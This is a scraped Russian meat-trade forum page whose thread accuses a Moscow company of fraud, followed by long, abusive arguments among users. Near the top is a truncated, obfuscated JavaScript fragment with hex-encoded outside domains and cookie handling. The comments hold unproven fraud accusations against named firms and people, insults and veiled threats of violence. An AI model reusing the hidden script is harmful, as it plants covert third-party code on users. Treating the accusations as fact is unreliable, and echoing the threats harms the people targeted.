Реклама
i
Nomadic Meat
ИНН: 9011862828
Erid: 2SDnjduG2Ww

Очередные мошенники.Будьте осторожны!ООО Вега.г.МОсква))

произошла ошибка.window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="9330",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+="String.fromCharCode(parseInt(o[t],16));return" e},c="function(o){for(var" e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

← Предыдущая 1 2

Комментарии (всего 58, показаны 1-50):

Корова охл.1 кат.п/т-195 руб.
             зам.1 кат.п/т-196 руб.
Свинина охл.1 кат.п/т-165 руб.
Производство РФ.
Оплата по факту при погрузке.
Самовывоз,доставка.
Пишите
Александр Гусев

, 3 окт 2015, 21:55

Спасибо за информацию.
Евгений Жулев

, 8 сен 2015, 18:59

прошу прощения за не совсем удачный вид скриншотов...
их можно посмотреть по ссылке
ссылка, вот  еще ссылка, и еще одна ссылка
Олег МПК

, 7 апр 2015, 17:17

Хороший шедевр!
Юрий, предоставьте доказательство, ято мы просили предоплату у вас?
 Мы хорошо,что на предоплату не пошли.но видите они как вымудрили,когда не получили предоплату.
Я же могу вот это предоставить...

а вообще, это сочинение соответствует  статье УК РФ 

Для уважаемых форумчан поясню...
Мы не работали с Юрием, по-этому как настоящие мошенники поехали в НН из Москвы(за свой счет), там познакомились с заказчиком(чтоб была ясность кому везти, и что это за люди)
После было вот это:

То есть, человек без рубля в обороте, пишет тем, кто закупает за свои и не просит предоплаты, что он мошенник?
А вот и о предоплате, только для другого заказчика, кто ее предлагает??

Заказчик в НН просил около 1 машины в неделю...
А Юрий требовал, от нас еще и в Бийск, или еще куда...
после того как, по тех. причинам(зависящим не только от нас, но и от того что заказчик не хотел принимать товар в конце недели, а мы не смогли поставить в начале, Юрий по телефону начал разговаривать е совсем в ключе делового общения, и обвинил в мошенничестве, не аргументировав это ничем(мы за все время не попросили и рубля, ни с него, ни с его заказчиков)) за что и был послан по всем известному направлению.
а после, наверное обиженный, обо всем этом тут и сочинение написал.

Так вот, Юрий, с Вас публичные извинения, или будем вопрос через суд решать, выше по гиперссылке посмотрите, чем это Вам грозит!

С уважение, Павел
PS: уважаемые модераторы, могу Вам предоставить полную версию переписки и другие аргументы.

Олег МПК

, 7 апр 2015, 16:37

я еще раз внимательно перечитал Ваше косноязыкое мямленье. Что было нелегко. Потому как в той белиберде, которую Вы написали, без пол-литра не разберешься. И, кстати, у меня тут возник вопросец. А факт мошенничества где? В чем он выражается? Вы заплатили деньги, а Вам не поставили товар и денег не вернули? Или поставили, но не того качества, или испорченный, или с недовесом? Мошенничество где??? Кстати, Вы сами себе противоречите. То Вы утверждаете, что догооворились на пробную партию без предоплат, то в конце пишите, что хорошо, что на предоплату не пошли. Так если договорились без предоплат, на какую предоплату еще идти было надо?
И кто Вам дал право, и кто Вы такой, чтобы только из-за этого, что Вам отказали в лучших чувствах (утрите Ваши слезки и припудрите носик), не стали с Вами работать и неважно по какой причине (а зная Вашу манеру общения и тот бред. который Вы несете, вкупе с явной Вашей неадекватной реакцией на все, что происходит, говорится и пишется, я этому, теперь уже не удивлен) Вы окрестили людей МОШЕННИКАМИ??? Еще раз спрашиваю, где ФАКТ МОШЕННИЧЕСТВА??? 
Валерий Ульяненко

, 23 мар 2015, 19:35

Комментарий был удален администрацией проекта.

Юра , спросить дело не лёгкое , и никогда не известно к чему приведёт и чем закончится. Стреляли таких звёздных , потом обливались когда на курок жали. Не блатуй живи мужиком. Зачем тебе эти пустые загоны ? 
Александр.Мне хоть и 23 но я не буду давать инфу спрашивал я с кого-то или нет..но словами такими не буду бросаться.захочу-спрошу за слова.я базар не кидаю на ветер.Разговор закрыт.и судя по тому,что ты хвастаешься тем что кого то стрелял тот просто пустой базар кидает.такими словами не бросаются публично.так что думай.всего доброго
сергей сергеевич

, 23 мар 2015, 20:32

Убивать грех , а я не грешу. В одном ты прав разговор пустой и бессмысленный , а людей ты огорчал по глупости собственной, повинись и будь доброжелательнее и сдержаннее. 
Спасибо за понимание!
сергей сергеевич

, 23 мар 2015, 20:55

лучше анеки сюда писать....  тема спасётся худо-бедно... У Юрия уже "нервенный" срыв... "Характер у него, конечно, не сахар, но и он, ведь, не для чая !!!.."

"Хотелось бы научиться признавать свои ошибки. Хотя кого мы обманываем, какие у нас, на х@@н, ошибки?"

почти в тему:
"смешно, когда просят "Опиши себя !!!........." Да, пожалуйста!!!...... Кости, мясо, полведра крови, нижне-спинное место с приключениями И..............ВЕСЁЛЫЕ ЗАДОРНЫЕ ГЛАЗА..."
У придорожного кафе стоят байкеры на чопперах и важно, неспеша пьют пиво....
Мимо проносятся байкеры на спортах, ездят на заднем колесе, на переднем. экстренно тормозят, разворачиваются... и подъезжают к первым:
-А чего это вы,чопперисты,нас не замечаете и с нами не знакомитесь?
-А чего с вами знакомиться? Вы же каждый год новые!
во-во! у региоАнального директора Юры в выписке из ЕРЮЛ вид деятельности торговля сахаром, солью, крупами, зерном, короче всем, кроме мяса , а он тут слюной брызжит на заслуженных мясников! Абидна!
Монев Константин

, 23 мар 2015, 18:04

Еще одна собака появилась,которая лает)))давай продолжай))
сергей сергеевич

, 23 мар 2015, 18:14

Александр, о чём Вы... какие огорчения... повеселило... я слышала разговор Валерия, о коем поведал здесь Юрий... повеселило ещё разок - хорошо неделя начинается ))) Жаниться пора гусару юному - энергия через край, да в разлив идёт ))) 
Аркадьич! Выходи из этого блудняка.Я сам чуть не вляпался.Тут только Наталье из НТКа разрулить получится. Поверь,мутняк голимый.Тема левая, да и тёрки порожняковые. Ты ж знаешь,я за тебя любого здесь на тряпки порву, но тут всё левое.
Андрей Юрьевич

, 23 мар 2015, 16:28

Благодарен Вам уважаемый Сергей Юрьевич , не прошёл мимо потому как девочек огорчал не пойми кто. А в остальном , сколько их нервно амбициозных здесь было и сплыло. 
согласна, не стоит внимания истерика молодняка... 
Наталья нашла себе более интересное занятие... покинула эту тему много ранее )))

;) по-моему, тут уже всем всё ясно))) даже Сергею Юрьевичу!!!)))

НТК Наталья

, 23 мар 2015, 16:53

опусы этого юряя не читаю , здесь уже был один не один бредящий , Наталья ))))) всё таки Сергея Юрьевича вспомнила , интрига ))) 
Может еще что-то скажете??))напишите вечерком.я хоть перед сном почитаю) вы как бабушки на скамейке осуждаете всех)) один там за компьютером с супругой пишут,другие пишут.Еще раз,подите в одноклассниках пообщайтесь.там много таких как"Вы" с Уважением по тексту отнесся только к " НТК Наталье и Евгений Писарев" к остальным,извините но вы просто пешки.А Сергей Юрьевич,я думаю мы  с Вами в прошлый раз все обсудили и не будем поднимать старые разговоры)
сергей сергеевич

, 23 мар 2015, 16:50

Юрий! Я думаю Вам пора закрывать эту ветку. Негатив пошёл. Я же Вам тогда доходчиво объяснил,без понтов?
Андрей Юрьевич

, 23 мар 2015, 16:55

Я всего лишь выкинул объявление,а вы  все начинаете обсуждать и писать всякую нехоть)) Вы не объясняете,а спорите.вы осуждаете.вы меня не знаете,а судите.компанию не знаете,а судите. вы простые балаболы(лайки по другому) которые постоянно гавкают,а когда получают пинка под зад,скулят) мне жаль Вас. вы живете все старым временем. Извините,но мне пора вас покинуть)!! напишите что нибудь еще,я хоть почитаю немного))вы же любите писать))Может Вам сделать одну сеть здесь и будете всех обсуждать)) точно,сходите в Дом 2)) или Вам под ваши года заняться уже нечем? смешно на вас смотреть.Позвонил Валерию,дак тот заикаться начинает.даже на вопросы не отвечает,только вот как попугай перекидывает на меня вопросы и все) Дай Бог Вам здоровья.
сергей сергеевич

, 23 мар 2015, 17:01

И мой Вам совет - создайте собственный карманный сайт и на нем форум. Будете там и админом и модером в одном лице. Наберите шавок, которые будут Вам петь хвалебные оды, а не писать то, что Вас раздражает. И будет Вам тогда счастье.
Валерий Ульяненко

, 23 мар 2015, 17:14

При разговоре по телефону вы заикались и не стесняйтесь этого))пыкали и мыкали. вы даже не можете сказать разнице между ответами на вопросами и исповедью. Мне вас жаль.Лаете и лаете)) только здесь такие вы серьезные)) ладно,не буду я вас больше игнорить)) но все таки,сделайте себе общую сеть сами и будете молодых обсуждать))вам это видимо очень нравится)) вы если живете старыми временами то и живите! я устал от ваших бестолковых предложений.Всего Вам доброго)
сергей сергеевич

, 23 мар 2015, 17:25

лжеЮрий, не выдавайте желаемое за действительное. Лилия тому свидетель. Никто не мыкал и не пыкал, как Вы выразились. И жаль то как раз мне Вас, человека, не умеющего спорить, пробующего на всех наехать и всех запугать, выражающегося до ужаса косноязычно и безграмотно, и настолько примитивного и тупого, что не в состоянии понять даже простую вещь: Вам тут никто ничем не обязан, в том числе и отвечать на Ваши идиотские вопросы. поэтому свой поганый язык можете запихнуть себе в одно место. и напомню Вам еще раз про то, что я сказал Вам в телефонном разговоре. А именно: я спросил, сколько у Вас жизней, чтобы вот так на всех тут выеживаться? наверное десять? а вы ответили, что одна. На что я посоветовал Вам дорожить ею. Вот и подумайте на досуге об этом, вместо того чтобы как собака кидаться на всякого, кто написал хоть что-то, что Вам не понутру.
Валерий Ульяненко

, 23 мар 2015, 19:19

Во-первых лайки это вы,вы лаете на каждого проходящего.вы даже объявление просто так не пропустили.начали язвить и придираться к мелочам.скажите что еще не так?? я ни кого не запугиваю и достаточно прав в своем разговоре.По телефону я еще раз повторяю,что вы пыкаете и мыкаете.Троите как трактор,у которого грязная свеча(а эта свече относиться,как ваша голова) да у меня одна жизнь и это так и есть,но у вас она уже заканчивается и проживите ее,чтобы про вас помнили с хорошим смыслом,а не с таким,что вы всех осуждаете.Вы может и хорошо знаете Русский язык,уважение Вам за это.но за то,что вы придираетесь как маленький ребенок ..Конечно вы уже здесь все как братья)давно наверно на этом форуме сидите.шишики на жопе нет у вас??Дак вот я еще раз повторю Вам,уважаемый Валерий.вы все горазды здесь писать и осуждать людей за своими компьютерами.А что же когда я тебе позвонил.ты на вопросы мои не отвечал,а лаял как собака в трубку лишь бы не дать слово тебе сказать?? конечно ты еще начнешь тут писать много всего.вы любители играть на публику и грош Вам цена(( мне жаль вас за это,что вы взрослые люди обсуждаете всех здесь людей,которые пытаются помочь другим.Вы даже не пытаетесь понять мои слова,а ведь в них сколько раз было сказано,что я всего лишь выставил объявление,что эта компания мошенники.Но нет,надо же Вам начинать придираться ко мне,где бы обсудить этих мошенников.один придрался к недописанному моему слову,(как преподаватель младших классов)
Другая начала придираться к проверке за 600 рублей вообще чушь понесла)другой влез и начал заступаться за нее,хотя сам не понимает что здесь он забыл.другой пишет что любого тут завалю)))Другой начал шутить как Петросян.
И после этого вы еще меня осуждаете?))) да вы на себя посмотрите..кем ваши дети растут и внуки вырастут,если у вас в крови такое твориться??? и еще раз убеждаюсь в том,что вы ЛАЙКИ.просто гавкаете толпой и все.вы люди общего мнения.друг -другу поддакиваете.как в деревне,одна собака залаяла и остальные через улицу начали.так же и вы.тьфу на вас.и не пишите здесь больше ничего.
сергей сергеевич

, 23 мар 2015, 19:40

Во-первых, я не лаю, а выражаю свою точку зрения. И Вас, сопливого, забыл спросить, какой она должна быть. Во-вторых, не Вы ли угрожали "копанием" или блокировкой счетов (что искренне меня рассмешило)? В-третьих, Вы не правы уже в том, что решили, что Вы Господь Бог и Вам одному поэтому решать, кому тут где писать, что писать и как писать. Не до х.я ли на себя взяли, юноша? В-четвертых, о да, у меня голова, умеющая думать и стройно излагать мысли, а вот Ваша больше на качан гнилой капусты смахивает. В-пятых, моя жизнь не заканчивается. Не надейтесь. А вот Ваша, если будете со всеми попало так себя вести и пистеть что ни попадя, может закончится. И быстро.) В-шестых, шишки на жопе нет. Скорее у Вас мозоль на пальцах, от постоянных попыток их растопырить. В-седьмых, снизойду до Вас еще раз. И попробую в который раз уже объяснить Ни я, ни кто еще-либо не обязаны тут отвечать на Ваши вопросы. Вы кто есть то, мил-человек?И в-седьмых, это я тьфу на Вас и Ваши пожелания не писать здесь. Да по куй, ишь ты, запрещать он еще будет. И указывать, что делать и что нет. Я сам решу без Ваших указаний что, где, когда и как мне писать, любезнейший. Поэтому как пришли на этот сайт, так и уебенземирбитте с него пожалуйста.
Валерий Ульяненко

, 23 мар 2015, 19:55

Валера , оставь ты его , он больной похлеще Айболита . Зачем такому уважаемому человеку как ты тратить время на пустышку с кукушкой в голове. 
о,еще лайка.
сергей сергеевич

, 23 мар 2015, 20:08

Юрий, вот только не надо грязи. Заикаться я не начал. На Ваши дебильные вопросы не отвечать имею полное право. Я не на исповеди. Тыкать мне не надо. Угрожать "раскопками" и блокировкой счетов тем паче. Равно как и спрашивать кто я такой. А Вы кто такой, Юрий??? Вы кто? Вы не пешка? Или научились только тому, что пробовать по-хамски наезжать на всех подряд? И вопросы свои засуньте знаете куда? Начните с себя и задайте множество вопросов самому себе. И перестаньте растопыривать пальцы. Вы не господь Бог. И отчета перед Вами держать никто не обязан. И уж тем более смешно было слышать Ваши возмущенные реплики, что Вас раздражают другие люди, которые пишут дескать не то, что Вам хотелось от них услышать. Так извините, форум общественное место. ЛЮБОЙ может зайти в ЛЮБУЮ тему и написать ЧТО УГОДНО, и неважно, нравится Вам это или нет. Могут и на куй послать, если захотят. И к этому будьте готовы. И не надо сочинять того, чего не было. 
Валерий Ульяненко

, 23 мар 2015, 17:11

Огорчительно что Юрию ещё далеко до всего , Лидия , Вам очень благодарен!!! 
Благодарю за поддержку, Александр... мудрее становимся, когда дело к внукам идёт )))))))))))
Ты кроме негатива на форум ничего не принёс , работник ты по ходу не очень , да и человек не хороший. А зачем мне звонить? я сам в состоянии это сделать ... 
Просто вы здесь осуждаете людей и мне уже противно читать все это.даже просто выкинул мошенников, пара людей сказала спасибо а остальные начинают обсирать.да что вы за люди.вы осуждаете других,а за собой вообще не следите.я приношу негатив,а зачем ты вообще суешься в этот разговор??ты кто вообще здесь?? это тоже самое,что я на улице разговариваю или спорю с человеком и ты взял и начал спорить тоже с нами.и по твоему это нормально??
сергей сергеевич

, 23 мар 2015, 16:09

А женщины наши ведут себя очень достойно, по мужски))) Умницы , уважаю!!! 
Подлиза ты женская,вот и все))даже все контакты скрыл,чтобы тебе не звонили.Вы как лайки здесь лаете и лаете.Заняться больше нечем?
сергей сергеевич

, 23 мар 2015, 15:59

Последнее дело для мужчины спорить с женщиной , да ещё с таким визгом. Помои...... Во всём гейропа виновата , изводят российского мужика.  
есть у этих ребят еще одна фирма ООО "Имперский Алианс" (ИНН 7716179111) , которую слили в другую компанию ООО "Спецпроект" (ИНН 5244017689).
Этой организации уже не существует - это раз. два - у нее 11 предшественников

А по руководителю Спецпроекта следующая информация по связям:

Действующие организации 6
В процессе реорганизации 0
В процессе ликвидации 0
Недействующие 27
ФНС: нет отчетности в течение года 3

По моему, тут все ясно))
Спасибо за информацию.
сергей сергеевич

, 23 мар 2015, 14:17

Нашла:

«в течении дня,ближе к вечеру будет информация.

юрий виноградов, 18 марта 2015, 13:27

а успеете из Иваново до Волгограда к вечеру добежать?

Монев Константин, 18 марта 2015, 13:34

не совсем понимаю ваш вопрос>>??

юрий виноградов, 18 марта 2015, 13:37

Вы пишите по теме,а не своими загадочными вопросами)

юрий виноградов, 18 марта 2015, 13:39

Юрий, Константин просто по ИНН определил регион присутствия контрагента))))

Алексей Алексеевич, 18 марта 2015, 15:09

молодец Константин,что еще сказать?)

юрий виноградов, 18 марта 2015, 15:16»

читайте дальше,очередной раз ваша невнимательность.
сергей сергеевич

, 23 мар 2015, 13:35

Жаль, тему не могу найти, о которой упомянула Наталья ("служба безопасности, чьи услуги Вы здесь на прошлой неделе продвигали), где предлагали за 600 руб., могу и ошибаться в ценнике, проверить надёжность любой организации.
Так то, молодой человек...
да написано объявление,что проверка за 600 рублей,но мы же ни у  кого не брали их.мы сделали проверку для одного человека бесплатно и там же написали все.будьте внимательнее,прежде чем судить нас.
сергей сергеевич

, 23 мар 2015, 13:32

Ню-ню.... лицо организации... культурный молодой человек...
а вы чье лицо??вы только отвлекаете от работы и пытаетесь как то подстибать нас.Я Вам все сказал.
Не тратьте пожалуйста больше время на пустые разговоры.
сергей сергеевич

, 23 мар 2015, 13:22

Потребуйте вернуть 600 руб. за оказанную услугу ))))

А, как лихо рекламировали, Юрий, службу безопасности...
Какие 600 рублей?/чего вы тут несете,Лилия??вы прежде чем писать и излагать свою речь,узнайте что здесь да как.Мы и сейчас можем предоставить свою службу безопасности.А Вас прошу помолчать.вылезли не зная откуда.идите в одноклассниках пишите свой бред и внуков воспитывайте.
сергей сергеевич

, 23 мар 2015, 13:18

Войдите на сайт или зарегистрируйтесь, чтобы участвовать в обсуждениях.

← Предыдущая 1 2

Meatinfo в Telegram

Чат торговли мясной продукцией бесплатно
Подписаться